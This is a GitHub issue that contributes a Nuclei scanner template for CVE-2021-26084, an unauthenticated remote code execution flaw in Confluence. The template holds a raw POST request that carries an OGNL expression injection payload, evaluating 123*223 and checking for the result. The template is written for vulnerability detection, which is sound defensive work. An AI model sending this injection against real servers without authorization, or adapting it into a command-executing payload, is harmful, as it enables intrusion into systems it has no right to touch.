### ISSUE TITLE
CVE-2021-26084

### ISSUE THREAD

**Issue by phulelouch** [projectdiscovery/nuclei-templates#2575]
CVE-2021-26084 

```yaml

id: CVE-2021-26084

info:
  name: Remote Code Execution on Confluence Servers
  description: Unauthenticated RCE
  author: phulelouch (https://twitter.com/phulelouch)
  severity: critical
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26084
  tags: cve,cve2021,Confluence

requests:
  - raw:
      - |
        POST /pages/doenterpagevariables.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Content-Length: 47
        Content-Type: application/x-www-form-urlencoded

        queryString=aaaa\u0027%2b#{123*223}%2b\u0027bbb

    matchers-condition: and
    matchers:
      - type: word
        part: body 
        words:
          - "27429"


```
